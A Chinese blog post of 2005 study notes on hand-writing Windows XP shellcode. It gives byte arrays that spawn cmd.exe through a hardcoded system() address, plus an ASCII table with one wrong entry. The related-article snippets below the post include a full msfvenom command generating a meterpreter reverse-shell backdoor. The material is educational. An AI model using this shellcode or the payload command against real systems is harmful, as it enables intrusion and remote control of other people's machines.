shellcode的初步编写

最新推荐文章于 2022-02-25 21:57:21 发布
最新推荐文章于 2022-02-25 21:57:21 发布
阅读量745 收藏
点赞数
文章标签: byte system command cmd 读书 c
  1  // 系统环境:xpsp2 + Microsoft Visual Studio .NET  2003
  2  // 这是我学习中写出来的。算是读书笔记一类的吧!
   3  // 时间  2005 12 03
  4  // 内容是关于shellcode的初步编写。此时我的系统函数地址是0xC7,0x93,0xBF,0x77。也就是77BF93C7
   5 作者:emissary
  6 
  7 
  8  // 这两天。听说当兵的那些人走了,不知道龚哲她是否也走了。
   9  // 再放一表上来。以后可能会用到。
  10  /*
 11  61h        a
  12  62h        b
  13  63h        c
  14  64h        d
  15  65         e
  16  66         f
  17  67         g
  18  68         h
  19  69         i
  20  6a        j
  21  6b        k
  22  6c        l
  23  6d        m
  24  6e        n
  25  6f        o
  26  70         p
  27  71         q
  28  72         r
  29  73         x
  30  74         t
  31  75         u
  32  76         v
  33  77         w
  34  78         x
  35  79         y
  36  7a        z
  37  */
 38 
 39  #include  < stdio.h >
 40  #include  < windows.h >
 41  #include  < winbase.h >
 42 
 43  // 这个是网上的一代码。和我写的不一样。环境不同。但两个都能用。
  44  char  shellcode_command[]  =  {
  45  0x8B,0xE5,  /* mov esp, ebp  */
 46  0x55,  /* push ebp  */
 47  0x8B,0xEC,  /* mov ebp, esp  */
 48  0x83,0xEC,0x0C,  /* sub  esp, 0000000C  */
 49  0xB8,0x63,0x6F,0x6D,0x6D,  /* mov eax, 6D6D6F63  */  
  50  0x89,0x45,0xF4,  /* mov dword ptr [ebp - 0C], eax */
 51  0xB8,0x61,0x6E,0x64,0x2E,  /* mov eax, 2E646E61  */  
  52  0x89,0x45,0xF8,  /* mov dword ptr [ebp - 08 ], eax */
 53  0xB8,0x63,0x6F,0x6D,0x22,  /* mov eax, 226D6F63  */  
  54  0x89,0x45,0xFC,  /* mov dword ptr [ebp - 04 ], eax */
 55  0x33,0xD2,  /* xor  edx, edx  */
 56  0x88,0x55,0xFF,  /* mov  byte  ptr [ebp - 01 ], dl  */
 57  0x8D,0x45,0xF4,  /* lea eax, dword ptr [ebp - 0C] */
 58  0x50,  /* push eax  */
 59  0xB8,0xC7,0x93,0xBF,0x77,  /* mov eax, system地址改成了我本机的。  */  
  60  0xFF,0xD0  /* call  eax  */
 61  };
  62 
 63 
 64  // 这个是我自己搞出来的code
  65  char  shellcode_cmd[]  = {
  66  0x8B,0xE5,
  67  0x55,
  68  0x8B,0xEC,       
  69  0x33,0xFF,
  70  0x57,
  71  0x83,0xEC,0x08,
  72  0xC6,0x45,0xF8,0x63,
  73  0xC6,0x45,0xF9,0x6D,
  74  0xC6,0x45,0xFA,0x64,
  75  0xC6,0x45,0xFB,0x2E,
  76  0xC6,0x45,0xFC,0x65,
  77  0xC6,0x45,0xFD,0x78,
  78  0xC6,0x45,0xFE,0x65,
  79  0x8D,0x45,0xF8,
  80  0x50,
  81  0xB8,0xC7,0x93,0xBF,0x77,
  82  0xFF,0xD0
  83  };
  84  // typedef void ( * MYPROC)(LPTSTR);   // 定义函数指针
  85 
 86  int  main()
  87  {
  88  // HINSTANCE LibHandle;
  89  // MYPROC ProcAdd;
  90  // LibHandle  =  LoadLibrary( " msvcrt.dll " );
  91  // ProcAdd  =  (MYPROC) GetProcAddress(LibHandle, " system " );  // 查找System函数地址
  92  // (ProcAdd) ( " cmd.exe " );  
  93  // return   0 ;
  94  LoadLibrary( " msvcrt.dll " );
  95  ((void( * )(void)) & shellcode_cmd)(); // 两个都可以运行。一个是command,一个是cmd。
  96  return   0 ;
  97 
 98  // __asm
  99  // {
 100  // mov esp,ebp ; 
 101     //  push ebp ; 
 102      // mov ebp,esp ;    把当前esp赋给ebp 
 103  // xor  edi,edi ;
 104     //  push edi ;压入0,esp- 4 ,; 作用是构造字符串的结尾字符。 
 105      // sub  esp,08h ;    这个我不知道是什么意思来着。
 106      // mov  byte  ptr [ebp - 08h],63h ;  c
 107      // mov  byte  ptr [ebp - 07h],6dh ;  m
 108      // mov  byte  ptr [ebp - 06h],64h ;  d
 109      // mov  byte  ptr [ebp - 05h],2Eh ;  .
 110     //  mov  byte  ptr [ebp - 04h],65h ;  e
 111     //  mov  byte  ptr [ebp - 03h],78h ;  x
 112     //  mov  byte  ptr [ebp - 02h],65h ;  e一个一个生成串
 113    //   lea eax,[ebp - 08h] ;   
 114  //    push eax ;    串地址作为参数入栈
 115     //  mov eax, 0x77BF93C7 ;
 116  //     call  eax ;      call  System函数的地址
 117  // }
 118  } 
BlueXray
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
投稿 | 初始ShellcodeShellcode执行工具编写思路
Ms08067安全实验室
04-19 502
文章来源|MS08067 公众号读者投稿本文作者:Arks7(Ms08067实验室读者)这是一段C++ 加载器的代码,代码来之倾旋大佬的博客,先看大佬给的注释。#include// 入口...
shellcode初步成就
weixin_33742618的博客
01-08 77
    最近一直在学习linux下shellcode编写,迷茫了很久。因为在实践看书上例子的时候,遇到了难题。一直运行不出结果。前两天突然找出了问题的所在,原来是栈保护机制的问题。GCC编译器、Linux操作系统提供了一些机制来防止缓冲区溢出这种攻击方法对系统产生危害。在Ubuntu和其他基于Linux内核的系统中,目前都采用内存地址随机化的机制来初始化堆栈,这将会使得猜测具体的内存地址变得十分...
msf生成linux shellcode,使用MSF打造各种ShellCode
weixin_39866419的博客
05-13 946
生成各种后门Windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -opayload.exeLinux:msfvenom -a x86 --pla...
windows的shellcode编写高级技巧
q1q2q3q4ln的专栏-随我一起研究程序
11-21 744
windows的shellcode编写高级技巧-(2013/11/20) win2k缓冲区溢出入门-(2013/11/20) windows密码泄露漏洞分析-(2013/11/20) 理解win2k和nt4系统及进程活动-(2013/11/20) 理解wind2k和nt4系统及进程活动-(2013/11/20) win2000登陆漏洞初步解决方法-(2013/11/20) win9x系
如何手动编写shellcode
weixin_34199335的博客
08-24 174
看来我是要从汇编入手做些事情了。汇编如今的用途不过是逆向工程,加解密,有害代码分析,漏洞挖掘以及一些有害代码生成,如病毒,缓冲区溢出攻击。首先申明这些我都不会,有些只知道皮毛。我连菜鸟都算不上,最多是条菜虫。 这几天看了看缓冲区溢出,写下来一点心得,一是希望有高人指导,二是总结一下。 今天说说shellcode的生成,当然是win32平台下的,linux本人没有什么研究(菜吧)。 she...
ShellCode编写实例—突破防火墙的ShellCode
P-Blog
08-30 1718
现在网络上获得控制台的ShellCode要么是在目标机上开一个端口,等待攻击者连接;要么是让目标机主动连接攻击者的主机,俗称反向连接。但前种方法一般都会被防火墙挡住,而后者反连不但需要攻击者有一个公网IP,而且也会被目标机端禁止外连访问的防火墙挡掉。那有没有更好的办法呢?    当然有了!不然大家认为WTF老大会让我在这里瞎折腾?!    第一种方法就是复用攻击时的Socket。我们在给目标机发送
Windows Shellcode学习笔记——shellcode在栈溢出中的利用与优化
weixin_33762130的博客
09-20 255
本文讲的是Windows Shellcode学习笔记——shellcode在栈溢出中的利用与优化, 0x00 前言 在《Windows Shellcode学习笔记——shellcode的提取与测试》中介绍了如何对shellcode初步优化,动态获取Windows API地址并调用,并通过程序实现自动提取机器码作为shellcode并保存到文件中。 0...
打造Windows下自己的ShellCode
it技术学习
06-13 4395
适合读者:漏洞分析员、黑迷 前置知识:汇编阅读能力,漏洞调试基本步骤,VC使用方法 WTF:这几次的菜鸟版EXP系列文章都是重点讲解溢出编程的原理和思路,包括漏洞的定位,利用构造以及遇到限制时ShellCode的编码技巧等,但对ShellCode本身的编写,特别是Windows环境下ShellCode初步编写,却很少提及。在文章中都是说发扬“拿来主义”,看准外面现成的ShellCod
PWN_初步认识
CheAyuki13的博客
08-17 4462
pwn简介:CTF中的pwn指的是通过通过程序本身的漏洞,编写利用脚本破解程序拿到主机的权限,这就需要对程序进行分析,了解操作系统的特性和相关漏洞,是是一个难度比较大的分支。 接下来介绍相关的学习思路(自己总结的,当作参考)0x01 基础知识准备 pwn相对于web,更需要专业的技能和知识,最主要的是要学会如何分析程序,这就需要有足够的准备c语言汇编语言python操作系统linux操作 C...
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 9010
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)
北豼不太皮的博客
02-21 3543
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)一、学习目标二、了解单片机STM32F401RET6三、C语言基础 一、学习目标 二、了解单片机STM32F401RET6 4、STM32F401RE特征 三、C语言基础 1.数据类型 常用2的次方: 2^7 = 128 2^8 = 256 2^15 = 32768 2^16= 65536 51单片机常见的数据类型: char: 占内存1字节 取值范围:-128~127 -2^7 ~ 2
Android开发(1) | Fragment 的应用——新闻应用
Jormungand_V的博客
02-21 7014
文章目录 news_item.xml: <TextView xmlns:android="http://schemas.android.com/apk/res/android" android:id="@+id/news_title" android:layout_width="match_parent" android:layout_height="wrap_content" android:lines="1" android:ellipsize="
系统学习 TypeScript(四)——变量声明的初步学习
编程三昧
02-25 1710
认识了 TypeScript 中的基础类型,接下来当然是变量声明的相关学习了,我在这里记录一下我学习过程中的一些总结。
清除浮动的五种方法
weixin_52212950的博客
02-22 2670
为什么要清除浮动?因为往往浮动后的子元素因为脱离了标准流,不能自动撑起父元素的高度,所以会对后续布局产生影响,对此清除浮动不如理解为清除浮动产生的影响更为合理。 例如:我们设置了两个盒子如图所示,粉色为父盒子,只有宽度没有高度,蓝色盒子有宽有高,粉色盒子的高由蓝盒子的高度撑开。 但是给蓝色的子盒子设置了左浮动后,脱离了标准流,无法再撑开粉盒子,可以看到粉盒子高度变成了0; 清除浮动有五种方法: 直接设置父元素的高度 额外标签法 单伪元素法 双伪元素法 ove.
HTML实现学习网站首页
做技术,坚持才是最重要的,一时的热情只是暂时的进步
02-20 4124
项目访问 reset.css /* http://meyerweb.com/eric/tools/css/reset/ v2.0 | 20110126 License: none (public domain) */ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del
C语言经典小游戏之----推箱子
嵌入式技术开发
02-25 4639
在进行推箱子的实验中,可以使用对应的API函数来改变对应箱子的颜色,也需要根据,人在移动的过程中,可以通过方向键,并改变对应的颜色,从而实现控制人物的目的。 代码实现如下: #include<stdio.h> #include<stdlib.h> #include<string.h> #include<windows.h> #include<conio.h> int x = 0, y = 0; //存储当前使用的...
关于Dubbo的mock=true降级无法调用降级类ServiceMock的解决方案
weixin_45754452的博客
02-25 1436
问题 消费者使用mock=“true”,想调用TestServiceMock进行服务降级无法调用 原因 我的项目结构如下,首先要知道服务降级代码应该是谁执行的,服务降级是服务消费者也就是controller包处对应的服务执行的,因为我只是测试dubbo怎么使用,所以并没有分多模块,但完全可以把一个包理解为一个模块,再看下面配置文件 为什么可以把一个包当成一个模块呢,因为我把配置文件的scan改成controller包然后启动一个服务器,即消费者,如果把scan改成service则可以启动服务提供者服务器
Vue---Vue基础
前端与计算机相关知识的分享,博主的qq523235674
02-25 1454
一.Vue概述 二.Vue的基本使用 2.1Vue.js之hello world 基本实例 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Document</title> </.
微小Shellcode编写技术
这篇文档是NGS (Next Generation Security Software Ltd.) 的安全研究团队成员Dafydd Stuttard撰写的一份关于编写小型Shellcode的电子书摘要。Shellcode是一种在计算机安全领域中用于利用漏洞执行特定任务的低级别...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值